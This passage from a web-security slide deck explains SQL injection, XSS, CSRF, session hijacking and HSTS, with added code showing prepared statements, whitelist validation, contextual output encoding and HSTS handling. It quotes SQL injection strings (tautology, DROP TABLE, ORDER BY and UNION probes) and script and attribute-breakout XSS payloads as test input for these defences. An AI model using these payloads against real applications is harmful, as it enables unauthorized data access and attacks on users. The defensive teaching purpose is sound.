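To see the difference between the concatenated query of the Typical Scenario and the prepared statement above in running code, here is an added example (not from the slides) that runs both forms against a constructed in-memory SQLite table with Python's DB-API parameter binding; the table rows are assumptions, and the attack input is written without the trailing quote so that the quote appended by the application code completes the statement exactly as on slide 18.

```python
import sqlite3

# Constructed sample data; the users table and its rows are assumptions for this example.
SAMPLE_USERS = [
    ("Alice", "alice@example.com"),
    ("Bob", "bob@example.com"),
    ("Carol", "carol@example.com"),
]

# The input from the attack slide, minus the trailing quote that the application code supplies.
INJECTION_INPUT = "Bob' or '1'='1"


def make_db():
    """Create an in-memory database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (name, email) VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def build_sql_unsafe(u_name):
    """String concatenation exactly as in the vulnerable queryDB() on the slide."""
    return "SELECT * FROM users WHERE name = '" + u_name + "'"


def query_db_unsafe(conn, u_name):
    """Vulnerable: the user input becomes part of the SQL text the database parses."""
    return conn.execute(build_sql_unsafe(u_name)).fetchall()


def query_db_safe(conn, u_name):
    """Prepared statement: the SQL text is fixed and u_name is bound as a value."""
    return conn.execute("SELECT * FROM users WHERE name = ?", (u_name,)).fetchall()


def compare(u_name):
    """Return (rows from the unsafe query, rows from the safe query) for the same input."""
    conn = make_db()
    try:
        return query_db_unsafe(conn, u_name), query_db_safe(conn, u_name)
    finally:
        conn.close()


if __name__ == "__main__":
    print(build_sql_unsafe(INJECTION_INPUT))
    unsafe_rows, safe_rows = compare(INJECTION_INPUT)
    print("unsafe returned %d rows, prepared statement returned %d rows"
          % (len(unsafe_rows), len(safe_rows)))
```

With the injected input the concatenated query returns every row, while the prepared statement looks for a user literally named Bob' or '1'='1 and returns none.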
36. SQL Injection Prevention
Least Privilege - Always minimize database privileges to reduce the impact of a flaw
White List Input Validation - for example
"(555)123-1234",
"555.123.1234", and
"555";DROP TABLE USER;--123.1234"
all convert to 5551231234
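An added example, not part of the slides, of white list validation for the two inputs this deck handles: the phone number above, canonicalized to digits first so that all three samples become 5551231234, and the numeric id parameter from the hands-on URLs, which is accepted only when it is nothing but digits. The function names and the size limits are my assumptions.

```python
import re

# Canonical phone form: exactly ten digits, matching the slide's "all convert to 5551231234".
PHONE_CANONICAL = re.compile(r"[0-9]{10}")
# White list for a record identifier such as ?id=51: ASCII digits only, bounded length.
ID_WHITELIST = re.compile(r"[0-9]{1,9}")


def canonicalize_phone(raw):
    """Keep only ASCII digits; punctuation, quotes and any SQL fragment are dropped."""
    return re.sub(r"[^0-9]", "", raw)


def validate_phone(raw):
    """Return the canonical ten-digit number, or None when the input is not a phone number."""
    digits = canonicalize_phone(raw)
    return digits if PHONE_CANONICAL.fullmatch(digits) else None


def validate_id(raw):
    """Return the id as an int, or None. No canonicalization here: the value must already be clean,
    so a trailing quote, an ORDER BY or a UNION is rejected rather than silently stripped."""
    raw = raw.strip()
    return int(raw) if ID_WHITELIST.fullmatch(raw) else None


if __name__ == "__main__":
    for sample in ['(555)123-1234', '555.123.1234', '"555";DROP TABLE USER;--123.1234"']:
        print(repr(sample), "->", validate_phone(sample))
    for sample in ["51", "51'", "51 order by 12--", "-51 union select 1,2,3"]:
        print(repr(sample), "->", validate_id(sample))
```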
37. SQL Injection Prevention
NOW YOU KNOW THE BASICS BUT YOU NEED TO KNOW MORE
Prepared Statements
Stored Procedures
Escaping
38. Cross - Site Scripting (XSS)
XSS Explained
Three Examples of XSS
The Basic Fixes
More Resources
39. OWASP Top 10 - 2013
40. EXAMPLE #1
TARGET OF XSS
A BRIEF COMPARISON OF SQL INJECTION AND XSS
THE TARGET OF SQL INJECTION IS THE DATABASE SERVER
THE TARGETS OF XSS ARE OTHER USERS
41.
XSS DEFINED: XSS IS SCRIPT INJECTION
GOAL: DISTRIBUTE MALICIOUS SCRIPTS
45. EXAMPLE #2
XSS IN MORE DETAIL…
Static Content:
    <HTML>
    <BODY>
    <H1>Upload Video</H1>
    <H2>Description</H2>
    </BODY>
    </HTML>
User Supplied Content:
    Video Training Description
EXAMPLE #2
The attacker submits a description on VideoTutorialsSite:
Video Training Description
<script>/*Evil code*/</script>
EXAMPLE #2
XSS IN MORE DETAIL…
<HTML>
<BODY>
<H1>Upload Video</H1>          <!-- static content -->
<H2>Description</H2>           <!-- static content -->
Video Training Description     <!-- user supplied content, echoed without encoding... -->
<script>/*Evil code*/</script> <!-- ...so the attacker's script is now part of the page -->
</BODY>
</HTML>
EXAMPLE #2
Video Training Description
<script>/*Evil code*/</script>
Attackers can use JavaScript to:
- steal your session ID
- rewrite any part of the HTML page
- overlay the login screen with their own, to steal the username and password
EXAMPLE #3
RESULTING CODE SNIPPET (template)
Enter your name:
<input type="text" id="uname" value="" />
GUEST BOOK
Input: Alice
Result: value="Alice"
NOW CONSIDER THIS INPUT
Alice" onmouseover="/*evil_action*/
RESULTING CODE SNIPPET
Enter your name:
<input type="text" id="uname" value="Alice" onmouseover="/*evil*/" />
GUEST BOOK
Input: Alice" onmouseover="/*evil*/
Result: value="Alice" onmouseover="/*evil*/"
The quote in the input closed the value attribute early, so the rest of the
input became a new event-handler attribute; no <script> tag was needed.
XSS Fixes
Developers fail to properly validate and encode the input data
XSS can only be prevented by secure coding practices: validate input on the
way in, and encode output for the context it is placed in on the way out
Encoding must be contextual!
XSS Fixes
PARTIAL LISTING OF CONTEXTS: EACH CONTEXT MUST BE ENCODED DIFFERENTLY
HTML body:          <HTML><HEAD></HEAD><BODY> … </BODY></HTML>
HTML attribute:     <div attr="…"></div>
URL attribute:      <img src="…"/>
JavaScript string:  <SCRIPT> alert('…') </SCRIPT>
CSS:                <STYLE> property: … </STYLE>
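Contextual output encoding for the first four contexts in the list, applied to the payloads from Example #2 and Example #3, as an added example in JavaScript (Node.js). This is not code from the original slides; the encoder names, the render helpers and the sample payloads are constructed for the demo, and the CSS context is left out because the slides give no CSS example.

```javascript
// Added example: one encoder per output context, applied to the slide payloads.

// The slide payloads, reused here as constructed test input.
const DESCRIPTION_PAYLOAD = "<script>/*Evil code*/</script>";
const GUESTBOOK_PAYLOAD = 'Alice" onmouseover="/*evil*/';

// HTML body context (<body>…</body>): the five characters that can start markup.
function encodeForHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// HTML attribute context (<div attr="…">): encode everything except alphanumerics
// as &#xHH; so a quote can never close the attribute, and an unquoted attribute
// cannot be broken out of with a space either.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) =>
    "&#x" + c.charCodeAt(0).toString(16).toUpperCase() + ";");
}

// JavaScript string context (<script>alert('…')</script>): \xHH / \uHHHH escapes
// so the attacker can terminate neither the string literal nor the <script> element.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 256
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// URL parameter context (<img src="…?q=…">): percent-encoding for a query value.
// For a whole src= attribute you would ALSO restrict the scheme to http/https.
function encodeForUrlParam(s) {
  return encodeURIComponent(String(s));
}

// Render the two slide templates with the right encoder for each slot.
function renderDescription(userText) {
  return "<H2>Description</H2>\n" + encodeForHtml(userText);
}
function renderGuestbookInput(userName) {
  return '<input type="text" id="uname" value="' + encodeForHtmlAttribute(userName) + '" />';
}

// A crude reviewer check: does a raw <script or a quote-then-handler survive
// into the rendered markup? (Used here only to show the encoders did their job.)
function containsRawMarkup(html) {
  return /<script/i.test(html) || /"\s*onmouseover=/i.test(html);
}

console.log(renderDescription(DESCRIPTION_PAYLOAD));
console.log(renderGuestbookInput(GUESTBOOK_PAYLOAD));
```

The point of the separate encoders is that the attribute encoder would be wrong inside a `<script>` block and the HTML-body encoder would be wrong inside an attribute; pick the encoder by where the value lands, not by where it came from.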
CSRF
Cross Site Request Forgery, abbreviated CSRF or XSRF, is also known as:
sea surf
one-click attack
session riding
OWASP Top 10 - 2013
Typical CSRF Scenario (diagram)
1. Auth request: the user logs in to e-Banking; site loaded.
2. The user follows a malicious link to the attacker's website.
3. The attacker's page has a malicious request to e-Banking embedded.
4. The browser sends it as an authenticated request, with the user's e-Banking session.
CSRF Attack in more detail..
Mr. Victim's browser sends an authenticated request to e-Banking to transfer money online:
HTTP POST https://mybank.com/transfer
Auth-cookie: 5234d574s4
TargetAccountNumber: 53645634635785
Amount: 2000.00
Attacker forges request: the browser attaches the Auth-cookie to any request for
mybank.com automatically, so the attacker's page only has to choose the body fields.
CSRF Prevention
Validating a secret token
Include a secret token with each state-changing request and validate on the
server that the received token is correctly bound to the user's session. The
attacker's page cannot read the token (same origin policy), so it cannot build
a request that passes the check.
Validating the HTTP Referer header
Accept requests only from trusted sources by verifying the Referer header.
Caveat: browsers, proxies and privacy extensions may strip the Referer, so treat
this as a secondary check alongside the token, not as the only defense.
Example #1: Corporate eMail (diagram)
Client and server exchange: list of e-mails, session cookie
Attacker on the network sees the same traffic: list of e-mails, session cookie
Session Hijacking
Because the login used HTTPS, the attacker could not see the password,
but they were able to steal the session cookie (sent over plain HTTP on every
later request) and see all transmitted data
Solution: Move the entire site to HTTPS, and mark the session cookie Secure so
the browser never sends it over HTTP
HTTPS ensures authenticity and prevents eavesdropping
There Are Still Several Risks…
Example #2: Corporate eMail
The user opens http://www.corp-email.com, so the first request goes out over plain HTTP
The server answers with a 302 redirect to https://www.corp-email.com, and only then
are the credentials sent over HTTPS
The unsecured HTTP request is vulnerable to attack
Man-In-The-Middle Attack: an attacker on the path intercepts that first plain-HTTP
request and answers it (or proxies it) in place of the real site, so the redirect
to HTTPS never protects the user
SOLUTION: STRICT TRANSPORT SECURITY HTTP HEADER
HSTS
The header is sent over a secure connection
HSTS converts HTTP links to HTTPS in the browser
Conversion happens entirely in the browser, before any request leaves it, so
there is no plain-HTTP request left for a man-in-the-middle to intercept
HSTS also prevents the user from accepting an untrusted connection (e.g. clicking
through a certificate warning)
HSTS
HSTS is language independent
It only requires putting the header in any response, e.g.
Strict-Transport-Security: max-age=31536000; includeSubDomains
The HSTS flag will ONLY be honored if sent over HTTPS!
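Both halves of HSTS as described on the last few slides, as an added example in JavaScript (Node.js); it is not code from the original slides. The server side decides when to send the header; the browser side is a small model of the HSTS store showing why the header is honored only over HTTPS, why http:// links are rewritten before any request leaves the browser, and what max-age and includeSubDomains do. The host names, the one-year max-age and the store shape are assumptions for the demo.

```javascript
// Added example: HSTS on the server (when to send it) and in the browser (how it is applied).

const ONE_YEAR = 31536000;

// Server: emit the header only on HTTPS responses. Plain-HTTP requests get a
// redirect to HTTPS and no HSTS header (the browser would ignore it anyway).
function serverResponse(isSecure, host, path) {
  if (!isSecure) {
    return { status: 301, headers: { Location: "https://" + host + path } };
  }
  return {
    status: 200,
    headers: { "Strict-Transport-Security": "max-age=" + ONE_YEAR + "; includeSubDomains" },
  };
}

// Browser: parse the directives (RFC 6797 syntax: max-age=<secs>; includeSubDomains).
// A header without max-age is invalid and yields null.
function parseHsts(value) {
  const policy = { maxAge: null, includeSubDomains: false };
  for (const raw of String(value).split(";")) {
    const directive = raw.trim();
    const m = /^max-age="?(\d+)"?$/i.exec(directive);
    if (m) policy.maxAge = Number(m[1]);
    else if (/^includeSubDomains$/i.test(directive)) policy.includeSubDomains = true;
  }
  return policy.maxAge === null ? null : policy;
}

// Browser: record the policy from a response, but ONLY if it arrived over HTTPS.
// `now` and `expires` are milliseconds. Returns true if the store changed.
function recordResponse(store, host, isSecure, response, now) {
  const header = response.headers["Strict-Transport-Security"];
  if (!isSecure || !header) return false;
  const policy = parseHsts(header);
  if (!policy) return false;
  if (policy.maxAge === 0) { delete store[host]; return true; } // max-age=0 clears the entry
  store[host] = { expires: now + policy.maxAge * 1000, includeSubDomains: policy.includeSubDomains };
  return true;
}

// Browser: before sending, rewrite http:// to https:// for a known host, or for a
// subdomain of a known host whose entry has includeSubDomains. Nothing goes out in clear.
function rewriteUrl(store, url, now) {
  const u = new URL(url);
  if (u.protocol !== "http:") return url;
  const labels = u.hostname.split(".");
  for (let i = 0; i < labels.length; i++) {
    const entry = store[labels.slice(i).join(".")];
    if (!entry || entry.expires <= now) continue;
    if (i === 0 || entry.includeSubDomains) {
      u.protocol = "https:";
      return u.toString();
    }
  }
  return url;
}

// Walk through Example #2: the very first visit is unprotected, a header over HTTP
// is ignored, the HTTPS response installs the policy, and later links are upgraded.
function walkthrough() {
  const store = {};
  const host = "www.corp-email.com";
  let now = 0;
  // 1. First ever visit: nothing is stored yet, so the http:// link is sent as is.
  const first = rewriteUrl(store, "http://" + host + "/login", now);
  // 2. The server redirects to HTTPS. Even if an HSTS header were attached to this
  //    plain-HTTP response, the browser would not store it.
  const plain = serverResponse(false, host, "/login");
  recordResponse(store, host, false,
    { headers: { "Strict-Transport-Security": "max-age=" + ONE_YEAR } }, now);
  const storedAfterHttp = Boolean(store[host]);
  // 3. The HTTPS response carries the header; now the browser records the policy.
  recordResponse(store, host, true, serverResponse(true, host, "/login"), now);
  // 4. A minute later, an http:// link to the site is rewritten inside the browser.
  now += 60 * 1000;
  const later = rewriteUrl(store, "http://" + host + "/inbox", now);
  // 5. Once max-age has elapsed the policy lapses (unless refreshed by another HTTPS visit).
  const expired = rewriteUrl(store, "http://" + host + "/inbox", now + (ONE_YEAR + 1) * 1000);
  return { first, redirect: plain.headers.Location, storedAfterHttp, later, expired };
}

console.log(walkthrough());
```

Step 1 is the residual risk the slides allude to: the first connection ever made to the site is still plain HTTP, which is why browsers also ship a preload list for sites that opt in.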
This demo is only
a starting point…
Conclusions &
Recommendations
Content is available under a Creative Commons 3.0 License unless otherwise noted.
martin@ahchiev.com
Editor's Notes
Rankings
Tutorials
Free frameworks for developing secure applications